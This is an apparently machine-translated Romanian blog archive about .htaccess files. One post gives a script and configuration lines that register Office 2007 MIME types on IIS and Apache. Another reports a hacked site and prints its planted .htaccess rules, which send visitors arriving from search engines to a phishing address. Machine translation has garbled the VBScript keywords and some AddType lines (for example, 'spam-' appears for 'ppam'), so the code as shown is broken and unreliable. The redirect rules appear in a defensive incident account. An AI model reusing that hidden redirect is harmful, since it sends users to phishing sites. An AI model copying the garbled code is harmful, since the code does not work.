Tag-Arhiva pentru » htaccess «

sâmbătă, 21 februarie, 2009 | Autor:

Relativ noi tipuri de documente Birou 2007 a dat unele probleme gazde web atunci când clienții lor doresc să ofere documente pentru descărcare. Cel mai adesea, documentele sunt oferite de către serverul web ca “text / html” care este apoi redat ca o tona de gunoi pe ecranul utilizatorului web.

Cel mai bun mod de a rezolva acest lucru este de a adăuga toate MIMA tipuri de configurare principal al serverului. IIS7 pentru Windows are deja aceste tipuri MIME configurat corect, în mod implicit. IIS6 și IIS5 necesită tipurile MIME pentru a fi adăugate, după cum s-ar putea Apache pe instalațiile mai vechi. pentru Apache, De asemenea, există o soluție pentru proprietarul domeniului individuale pentru a adăuga tipurile MIME, prin intermediul lui Apache .htaccess fișier.

IIS 6 Tipul MIME plus (pentru administratorul serverului)

Înainte de acest lucru se poate face, asigură că serverul este, de asemenea, setat pentru a permite editarea metabaza directă:

  1. Sarcină IIS manager de: Start -> RONU, “inetmgr” -> [O.K]
  2. Dați clic dreapta pe “Server” și faceți clic “Properties”
  3. În cadrul “Internet Information Services” fila (de obicei, singura fila), să se asigure că “Encapabil Direct metabazei Editare” bifat caseta de selectare.
  4. Clic [O.K]

Asigurați-vă că back-up de configurare IIS (aici pentru IIS5) dinainte. Nu va lua nici o responsabilitate pentru un administrator de rupere serverul lui. Am motive să cred asta Mai De asemenea, lucra la IIS5 cu toate acestea am la fel de mult motive să credem că ar putea da doar o mulțime de erori. În cazul în care un IIS5 / ferestre 2000 admin este dispus să testeze acest lucru pentru mine după copierea de rezervă configurația vă rog să-mi cunosc rezultatele.

Copiați următorul text într-un fișier numit msoff07-addmime.vbs și executați-l o singura data din commandline prin tastarea CScript msoff07-addmime.vbs și apăsând pe Enter. Dacă executați mai mult decât o dată, tipurile MIME vor fi adăugate de fiecare dată și veți avea mai multe intrări identice:

"Acest script adaugă Oficiul necesar 2007 tipuri MIME la un IIS 6 Server.
"Pentru a folosi acest script, doar dublu-clic sau executa dintr-o linie de comandă.
"Rularea acest script de mai multe ori rezultate în mai multe intrări în
"IIS MimeMap astfel încât să nu ar trebui să ruleze mai mult de o dată.
"Modificat de la adresa http://msdn.microsoft.com/en-us/library/ms752346.aspx
 
întunecos MimeMapObj, MimeMapArray, MimeTypesToAddArray, WshShell, oExec
const ADS_PROPERTY_UPDATE = 2 
 
"Setarea tipurilor MIME pentru a fi adăugate
MimeTypesToAddArray = mulțime(".docm", "application/vnd.ms-word.document.macroEnabled.12", _
".docx", "application/vnd.openxmlformats-officedocument.wordprocessingml.document", _
".dotm", "application/vnd.ms-word.template.macroEnabled.12", _
".dotx", "application/vnd.openxmlformats-officedocument.wordprocessingml.template", _
".potm", "application/vnd.ms-powerpoint.template.macroEnabled.12", _
".potx", "application/vnd.openxmlformats-officedocument.presentationml.template", _
".ppam", "application/vnd.ms-powerpoint.addin.macroEnabled.12", _
".ppsm", "application/vnd.ms-powerpoint.slideshow.macroEnabled.12", _
".ppsx", "application/vnd.openxmlformats-officedocument.presentationml.slideshow", _
".pptm", "application/vnd.ms-powerpoint.presentation.macroEnabled.12", _
".pptx", "application/vnd.openxmlformats-officedocument.presentationml.presentation", _
".sldm", "application/vnd.ms-powerpoint.slide.macroEnabled.12", _
".sldx", "application/vnd.openxmlformats-officedocument.presentationml.slide", _
".xlam", "application/vnd.ms-excel.addin.macroEnabled.12", _
".xlsb", "application/vnd.ms-excel.sheet.binary.macroEnabled.12", _
".xlsm", "application/vnd.ms-excel.sheet.macroEnabled.12", _
".xlsx", "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", _
".xltm", "application/vnd.ms-excel.template.macroEnabled.12", _
".xltx", "application/vnd.openxmlformats-officedocument.spreadsheetml.template") 
 
"Obține obiectul mimemap
A stabilit MimeMapObj = GetObject("IIS://Localhost / MimeMap")
 
"Call AddMimeType pentru fiecare pereche de extensie / tip MIME
Pentru tejghea = 0 pentru UBound(MimeTypesToAddArray) Pas 2
    AddMimeType MimeTypesToAddArray(tejghea), MimeTypesToAddArray(tejghea+1)
Următor →
 
"Crearea unui obiect Shell
A stabilit WshShell = CREATEOBJECT("WScript.Shell")
 
"Oprește-te și porni serviciul IIS
A stabilit oExec = WshShell.Exec("net stop w3svc")
Do In timp ce oExec.stare = 0
    WScript.Dormi 100
Buclă
 
A stabilit oExec = WshShell.Exec("net start w3svc")
Do In timp ce oExec.stare = 0
    WScript.Dormi 100
Buclă
 
A stabilit oExec = Nimic
 
"Raport de stare pentru utilizator
WScript.Ecou "Microsoft Office 2007 Tipurile de documente MIME au fost înregistrate."
 
"AddMimeType Sub
Sub AddMimeType (Ext, mTYPE)
 
    "Ia mapări de proprietate MimeMap.
    MimeMapArray = MimeMapObj.GetEx("MimeMap") 
 
    "Adăugați o mapare nouă.
    eu = UBound(MimeMapArray) + 1
    Redim Păstrați MimeMapArray(eu)
    A stabilit MimeMapArray(eu) = CREATEOBJECT("MimeMap")
    MimeMapArray(eu).Extensie = Ext
    MimeMapArray(eu).Mime = mTYPE
    MimeMapObj.PutEx ADS_PROPERTY_UPDATE, "MimeMap", MimeMapArray
    MimeMapObj.setinfo
 
Sfârşit Sub

Tipul MIME Apache plus (pentru administratorul serverului)

Apache stochează sale tipuri MIME într-un fișier localizat în mod normal, la $installpath / conf / mime.types. Vezi mod_mime documentație pentru mai multe despre modul în care funcționează. Arch Linux instalează sale tipuri MIME /etc / httpd / conf / mime.types și Parallels Plesk instalează-l în /usr / / / admin / PSA conf / mime.types locale. Distribuția dumneavoastră ar putea avea loc într-un alt, astfel încât găsiți mime.types fișier prin rularea localizați mime.types.

Adăugați următoarele linii în fișierul dvs. mime.types:

application/vnd.ms-word.document.macroEnabled.12                          docm
application/vnd.openxmlformats-officedocument.wordprocessingml.document   docx
application/vnd.ms-word.template.macroEnabled.12                          dotm
application/vnd.openxmlformats-officedocument.wordprocessingml.template   dotx
application/vnd.ms-powerpoint.template.macroEnabled.12                    potm
application/vnd.openxmlformats-officedocument.presentationml.template     potx
application/vnd.ms-powerpoint.addin.macroEnabled.12                       ppam
application/vnd.ms-powerpoint.slideshow.macroEnabled.12                   ppsm
application/vnd.openxmlformats-officedocument.presentationml.slideshow    ppsx
application/vnd.ms-powerpoint.presentation.macroEnabled.12                pptm
application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
application/vnd.ms-powerpoint.slide.macroEnabled.12                       sldm
application/vnd.openxmlformats-officedocument.presentationml.slide        sldx
application/vnd.ms-excel.addin.macroEnabled.12                            xlam
application/vnd.ms-excel.sheet.binary.macroEnabled.12                     xlsb
application/vnd.ms-excel.sheet.macroEnabled.12                            xlsm
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet         xlsx
application/vnd.ms-excel.template.macroEnabled.12                         xltm
application/vnd.openxmlformats-officedocument.spreadsheetml.template      xltx

Tipul MIME Apache plus (Pentru proprietarul domeniului cu cel puțin FTP acces – folosind fișierul .htaccess)

Adăugați textul următor pentru a domeniului dvs. .htaccess fișier, cel mai frecvent într-un httpdocs / director

AddType aplicatii / vnd.ms-word.document.macroEnabled.12 docm
AddType application / vnd.openxmlformats-officedocument.wordprocessingml.document docx
AddType application / vnd.ms-word.template.macroEnabled.12 dotm
AddType aplicatii / vnd.openxmlformats-officedocument.wordprocessingml.template dotx
AddType aplicatii / vnd.ms-powerpoint.template.macroEnabled.12 potm
AddType aplicatii / vnd.openxmlformats-officedocument.presentationml.template potx
AddType aplicatii / vnd.ms-powerpoint.addin.macroEnabled.12 spam-
AddType aplicatii / vnd.ms-powerpoint.slideshow.macroEnabled.12 ppsm
AddType aplicatii / vnd.openxmlformats-officedocument.presentationml.slideshow ppsx
AddType aplicatii / vnd.ms-powerpoint.presentation.macroEnabled.12 pptm
AddType application / vnd.openxmlformats-officedocument.presentationml.presentation pptx
AddType aplicatii / vnd.ms-powerpoint.slide.macroEnabled.12 sldm
AddType application / vnd.openxmlformats-officedocument.presentationml.slide sldx
AddType aplicatii / vnd.ms-excel.addin.macroEnabled.12 xlam
AddType aplicatii / vnd.ms-excel.sheet.binary.macroEnabled.12 xlsb
AddType aplicatii / vnd.ms-excel.sheet.macroEnabled.12 xlsm
AddType application / vnd.openxmlformats-officedocument.spreadsheetml.sheet xlsx
AddType aplicatii / vnd.ms-excel.template.macroEnabled.12 XLTM
AddType aplicatii / vnd.openxmlformats-officedocument.spreadsheetml.template xltx
Acțiune
Joi, January 22nd, 2009 | Autor:

I very recently found a problem with a client’s web site due to a .htaccess fișier. The site was hosted on a ferestre server running IIS using IISPassword, which makes use of .htaccess files for its settings.

IISPassword doesn’t follow exactly the same rules as with Apache totuși. If the .htaccess file exists then it must contain IISPassword-appropriate rules, otherwise the server returns only the following error:

Error 500 given by IIS Password
Here’s the content of the .htaccess file. I’ve only modified the final redirection URL to point to example.com appropriately:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,L]

If this were on a server running Apache with mod_rewrite, most web users would go directly to the correct site content. Only if they reached the site through the search engines and indexes listed in the .htaccess, would they be redirected to the siffy phishing url that the cracker wants victims to reach.

Desigur, the cracker (or perhaps even an automated worm) didn’t realise that the server in question didn’t even support these mod_rewrite rules. But either way, this is very worrying as I can foresee many arguments about whether or not the site is working

Acțiune